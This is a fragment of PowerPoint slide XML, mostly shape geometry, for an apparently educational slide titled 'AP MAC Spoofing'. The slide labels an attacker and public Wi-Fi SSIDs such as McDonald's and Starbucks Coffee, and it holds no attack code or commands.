                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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1" name="Freeform 874"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4393" y="2235"/>
                <a:ext cx="343" cy="98"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 62 h 1139"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1078 h 1139"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1139"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 62 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1139"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1139 h 11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16" h="1139">
                    <a:moveTo>
                      <a:pt x="4016" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1078"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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2" name="Freeform 875"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2256"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 900"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 900 h 900"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 900"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 900"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 9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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 900"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 900 h 9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23" h="900">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="900"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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3" name="Freeform 876"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4393" y="2275"/>
                <a:ext cx="343" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 62 h 1139"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1139 h 1139"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1080 h 1139"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1139"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 62 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1139"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1139 h 11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16" h="1139">
                    <a:moveTo>
                      <a:pt x="4016" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1080"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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4" name="Freeform 877"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2295"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 62 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 62 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="62"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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5" name="Freeform 878"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4393" y="2315"/>
                <a:ext cx="343" cy="97"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T1" fmla="*/ 61 h 1138"/>
                  <a:gd name="T2" fmla="*/ 0 w 4016"/>
                  <a:gd name="T3" fmla="*/ 1138 h 1138"/>
                  <a:gd name="T4" fmla="*/ 0 w 4016"/>
                  <a:gd name="T5" fmla="*/ 1077 h 1138"/>
                  <a:gd name="T6" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T7" fmla="*/ 0 h 1138"/>
                  <a:gd name="T8" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T9" fmla="*/ 61 h 1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16"/>
                  <a:gd name="T16" fmla="*/ 0 h 1138"/>
                  <a:gd name="T17" fmla="*/ 4016 w 4016"/>
                  <a:gd name="T18" fmla="*/ 1138 h 11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16" h="1138">
                    <a:moveTo>
                      <a:pt x="4016" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1077"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4016" y="6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6" name="Freeform 879"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2335"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 59 h 897"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 897 h 897"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 836 h 897"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 897"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 59 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 897"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 897 h 89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23" h="897">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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7" name="Freeform 880"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2375"/>
                <a:ext cx="267" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 897"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 897 h 897"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 838 h 897"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 897"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 897"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 897 h 89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23" h="897">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="897"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="838"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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8" name="Freeform 881"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2415"/>
                <a:ext cx="267" cy="76"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 59 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 836 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 59 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="59"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="836"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="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9" name="Freeform 882"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm flipH="1">
                <a:off x="4736" y="2454"/>
                <a:ext cx="267" cy="77"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 3123"/>
                  <a:gd name="T1" fmla="*/ 61 h 898"/>
                  <a:gd name="T2" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T3" fmla="*/ 898 h 898"/>
                  <a:gd name="T4" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T5" fmla="*/ 839 h 898"/>
                  <a:gd name="T6" fmla="*/ 0 w 3123"/>
                  <a:gd name="T7" fmla="*/ 0 h 898"/>
                  <a:gd name="T8" fmla="*/ 0 w 3123"/>
                  <a:gd name="T9" fmla="*/ 61 h 8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23"/>
                  <a:gd name="T16" fmla="*/ 0 h 898"/>
                  <a:gd name="T17" fmla="*/ 3123 w 3123"/>
                  <a:gd name="T18" fmla="*/ 898 h 89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23" h="898">
                    <a:moveTo>
                      <a:pt x="0" y="61"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3123" y="898"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3123" y="839"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="6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50" name="WordArt 883"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="4425" y="2091"/>
                <a:ext cx="301" cy="147"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" fromWordArt="1" anchor="ctr">
                <a:prstTxWarp prst="textSlantDown">
                  <a:avLst>
                    <a:gd name="adj" fmla="val 44444"/>
                  </a:avLst>
                </a:prstTxWarp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3600" b="0" i="0" u="none" strike="noStrike" kern="10" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:prstClr val="black"/>
                      </a:solidFill>
                      <a:round/>
                      <a:headEnd/>
                      <a:tailEnd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Arial Black"/>
                    <a:ea typeface="+mn-ea"/>
                    <a:cs typeface="+mn-cs"/>
                  </a:rPr>
                  <a:t>SHOP</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="951" name="Group 1059"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4506" y="2398"/>
                <a:ext cx="93" cy="128"/>
                <a:chOff x="4499" y="2398"/>
                <a:chExt cx="93" cy="128"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="952" name="Freeform 1057"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4499" y="2398"/>
                  <a:ext cx="46" cy="115"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 46"/>
                    <a:gd name="T1" fmla="*/ 0 h 115"/>
                    <a:gd name="T2" fmla="*/ 0 w 46"/>
                    <a:gd name="T3" fmla="*/ 103 h 115"/>
                    <a:gd name="T4" fmla="*/ 46 w 46"/>
                    <a:gd name="T5" fmla="*/ 115 h 115"/>
                    <a:gd name="T6" fmla="*/ 46 w 46"/>
                    <a:gd name="T7" fmla="*/ 12 h 115"/>
                    <a:gd name="T8" fmla="*/ 1 w 46"/>
                    <a:gd name="T9" fmla="*/ 0 h 11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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 115"/>
                    <a:gd name="T17" fmla="*/ 46 w 46"/>
                    <a:gd name="T18" fmla="*/ 115 h 11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6" h="115">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="1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 w="6350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Freeform 1058"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="4546" y="2411"/>
                  <a:ext cx="46" cy="115"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1 w 46"/>
                    <a:gd name="T1" fmla="*/ 0 h 115"/>
                    <a:gd name="T2" fmla="*/ 0 w 46"/>
                    <a:gd name="T3" fmla="*/ 103 h 115"/>
                    <a:gd name="T4" fmla="*/ 46 w 46"/>
                    <a:gd name="T5" fmla="*/ 115 h 115"/>
                    <a:gd name="T6" fmla="*/ 46 w 46"/>
                    <a:gd name="T7" fmla="*/ 12 h 115"/>
                    <a:gd name="T8" fmla="*/ 1 w 46"/>
                    <a:gd name="T9" fmla="*/ 0 h 11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6"/>
                    <a:gd name="T16" fmla="*/ 0 h 115"/>
                    <a:gd name="T17" fmla="*/ 46 w 46"/>
                    <a:gd name="T18" fmla="*/ 115 h 11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6" h="115">
                      <a:moveTo>
                        <a:pt x="1" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="103"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="115"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="46" y="1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 w="6350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954" name="Straight Arrow Connector 953"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="840" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9368316" y="3622375"/>
              <a:ext cx="399868" cy="916053"/>
            </a:xfrm>
            <a:prstGeom prst="straightConnector1">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="28575">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:prstDash val="sysDot"/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5" name="Text Box 2985"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="gray">
            <a:xfrm>
              <a:off x="2489428" y="6070418"/>
              <a:ext cx="91243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Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attacker</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="958" name="Picture 957" descr="A picture containing clock&#10;&#10;Description automatically generated">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6FA1650-1D4A-470C-8AB0-F46EFCD89CA2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476441" y="4518367"/>
              <a:ext cx="982771" cy="1317961"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="964" name="Picture 963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EFBA384C-B5E3-4E2C-985C-C1C68DC7EC1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6442348" y="1222491"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="965" name="Picture 964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03DD41F7-DF93-4467-822C-C1250CA4499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1924533" y="2249663"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="966" name="Picture 965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238A535B-D45A-4BCB-8BDC-991815DF250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4054347" y="1500420"/>
              <a:ext cx="284712" cy="234264"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="895" name="Rectangle 894"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6995160" y="4292207"/>
              <a:ext cx="1080745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SSID McDonald’s</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="896" name="Rectangle 895"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8170932" y="4292207"/>
              <a:ext cx="133882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SSID Starbucks Coffee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3215098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DD4C570E-1065-4A3F-A832-B328DF9B088A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4891" b="34891"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1588" y="0"/>
            <a:ext cx="12188825" cy="2209800"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Title 594">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FAEB528-4C7B-4544-A0E2-8A4A2040785A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="528637"/>
            <a:ext cx="4752975" cy="585788"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914309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IN" sz="3600" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AP MAC Spoofing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="598" name="Полилиния 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941" y="0"/>
            <a:ext cx="12190119" cy="2286000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 17293422 w 18288000"/>
              <a:gd name="connsiteY0" fmla="*/ 0 h 7143751"/>
              <a:gd name="connsiteX1" fmla="*/ 18288000 w 18288000"/>
              <a:gd name="connsiteY1" fmla="*/ 0 h 7143751"/>
              <a:gd name="connsiteX2" fmla="*/ 18288000 w 18288000"/>
              <a:gd name="connsiteY2" fmla="*/ 829796 h 7143751"/>
              <a:gd name="connsiteX3" fmla="*/ 4884947 w 18288000"/>
              <a:gd name="connsiteY3" fmla="*/ 7143751 h 7143751"/>
              <a:gd name="connsiteX4" fmla="*/ 0 w 18288000"/>
              <a:gd name="connsiteY4" fmla="*/ 5515055 h 7143751"/>
              <a:gd name="connsiteX5" fmla="*/ 0 w 18288000"/>
              <a:gd name="connsiteY5" fmla="*/ 5385286 h 7143751"/>
              <a:gd name="connsiteX6" fmla="*/ 4926914 w 18288000"/>
              <a:gd name="connsiteY6" fmla="*/ 6719010 h 7143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288000" h="7143751">
                <a:moveTo>
                  <a:pt x="17293422" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="18288000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18288000" y="829796"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4884947" y="7143751"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5515055"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5385286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4926914" y="6719010"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="FFC600">
              <a:alpha val="9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99" name="Group 598">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C24179EF-1625-4120-B296-A10090DEBF23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="568690" y="1093841"/>
            <a:ext cx="11316185" cy="5389999"/>
            <a:chOff x="568690" y="1036691"/>
            <a:chExt cx="11316185" cy="5389999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="600" name="Freeform 62">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBC4850B-397F-4543-AEA5-A8FC8059F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6532" y="1120602"/>
              <a:ext cx="4143158" cy="1231410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1719 w 2134"/>
                <a:gd name="T1" fmla="*/ 3 h 735"/>
                <a:gd name="T2" fmla="*/ 1642 w 2134"/>
                <a:gd name="T3" fmla="*/ 21 h 735"/>
                <a:gd name="T4" fmla="*/ 1497 w 2134"/>
                <a:gd name="T5" fmla="*/ 8 h 735"/>
                <a:gd name="T6" fmla="*/ 1417 w 2134"/>
                <a:gd name="T7" fmla="*/ 0 h 735"/>
                <a:gd name="T8" fmla="*/ 1353 w 2134"/>
                <a:gd name="T9" fmla="*/ 6 h 735"/>
                <a:gd name="T10" fmla="*/ 1193 w 2134"/>
                <a:gd name="T11" fmla="*/ 21 h 735"/>
                <a:gd name="T12" fmla="*/ 1132 w 2134"/>
                <a:gd name="T13" fmla="*/ 6 h 735"/>
                <a:gd name="T14" fmla="*/ 1068 w 2134"/>
                <a:gd name="T15" fmla="*/ 0 h 735"/>
                <a:gd name="T16" fmla="*/ 988 w 2134"/>
                <a:gd name="T17" fmla="*/ 8 h 735"/>
                <a:gd name="T18" fmla="*/ 842 w 2134"/>
                <a:gd name="T19" fmla="*/ 21 h 735"/>
                <a:gd name="T20" fmla="*/ 766 w 2134"/>
                <a:gd name="T21" fmla="*/ 3 h 735"/>
                <a:gd name="T22" fmla="*/ 701 w 2134"/>
                <a:gd name="T23" fmla="*/ 1 h 735"/>
                <a:gd name="T24" fmla="*/ 623 w 2134"/>
                <a:gd name="T25" fmla="*/ 13 h 735"/>
                <a:gd name="T26" fmla="*/ 478 w 2134"/>
                <a:gd name="T27" fmla="*/ 17 h 735"/>
                <a:gd name="T28" fmla="*/ 401 w 2134"/>
                <a:gd name="T29" fmla="*/ 2 h 735"/>
                <a:gd name="T30" fmla="*/ 330 w 2134"/>
                <a:gd name="T31" fmla="*/ 2 h 735"/>
                <a:gd name="T32" fmla="*/ 241 w 2134"/>
                <a:gd name="T33" fmla="*/ 22 h 735"/>
                <a:gd name="T34" fmla="*/ 162 w 2134"/>
                <a:gd name="T35" fmla="*/ 63 h 735"/>
                <a:gd name="T36" fmla="*/ 95 w 2134"/>
                <a:gd name="T37" fmla="*/ 121 h 735"/>
                <a:gd name="T38" fmla="*/ 44 w 2134"/>
                <a:gd name="T39" fmla="*/ 193 h 735"/>
                <a:gd name="T40" fmla="*/ 12 w 2134"/>
                <a:gd name="T41" fmla="*/ 275 h 735"/>
                <a:gd name="T42" fmla="*/ 0 w 2134"/>
                <a:gd name="T43" fmla="*/ 368 h 735"/>
                <a:gd name="T44" fmla="*/ 7 w 2134"/>
                <a:gd name="T45" fmla="*/ 442 h 735"/>
                <a:gd name="T46" fmla="*/ 37 w 2134"/>
                <a:gd name="T47" fmla="*/ 527 h 735"/>
                <a:gd name="T48" fmla="*/ 83 w 2134"/>
                <a:gd name="T49" fmla="*/ 601 h 735"/>
                <a:gd name="T50" fmla="*/ 148 w 2134"/>
                <a:gd name="T51" fmla="*/ 662 h 735"/>
                <a:gd name="T52" fmla="*/ 224 w 2134"/>
